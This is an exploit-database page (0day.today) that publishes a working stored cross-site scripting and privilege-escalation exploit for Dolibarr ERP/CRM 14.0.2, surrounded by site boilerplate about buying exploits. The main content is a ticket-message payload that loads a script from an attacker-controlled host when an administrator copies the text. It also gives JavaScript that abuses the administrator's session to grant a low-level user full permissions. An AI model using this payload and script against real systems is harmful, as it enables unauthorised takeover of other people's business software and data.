0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Dolibarr ERP / CRM 14.0.2 Cross Site Scripting / Privilege Escalation Vulnerabilities
# Exploit Title: Dolibarr ERP & CRM v14.0.2 Stored XSS / Privilege Escalation # Exploit Author: Oscar Gutierrez (m4xp0w3r) # Vendor Homepage: https://www.dolibarr.org/ # Software Link: https://github.com/Dolibarr # Tested on: Ubuntu, LAAMP # Vendor: Dolibarr # Version: v14.0.2 # Exploit Description: # Dolibarr ERP & CRM v14.0.2 suffers from a stored XSS vulnerability in the ticket creation flow that allows a low level user (with full access to the Tickets module) to achieve full permissions. For this attack vector to work, an administrator user needs to copy the text in the "message" box. # Instructions: #1. Insert this payload in the message box when creating a ticket: "><span onbeforecopy="let pwned = document.createElement('script'); pwned.setAttribute('src', 'http://YOURIPGOESHERE/hax.js'); document.body.appendChild(pwned);" contenteditable>test</span> # #2. Host this file (Change the extension of the file to js and remove comments) in a remote http location of your preference. #NOTE: The user id in /dolibarr/htdocs/user/perms.php?id=2 may vary depending on the installation so you might have to change this. In my case, I had only 2 users, user 2 being the low level user. # #3.Once an administrator user copies the text within the ticket the attack will launch. function read_body(xhr) { var data = xhr.responseXML; var tokenizedUrl = data.getElementsByClassName("reposition commonlink")[0].href; console.log(tokenizedUrl); return tokenizedUrl; } function escalatePrivs() { var url = read_body(xhr); var http = new XMLHttpRequest(); http.open('GET', url); http.onreadystatechange = function() { if (this.readyState === XMLHttpRequest.DONE && this.status === 200) { return; } }; http.send(null); } var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState == XMLHttpRequest.DONE) { read_body(xhr); escalatePrivs(xhr); } } xhr.open('GET', '/dolibarr/htdocs/user/perms.php?id=2', true); # 0day.today [2024-12-26] #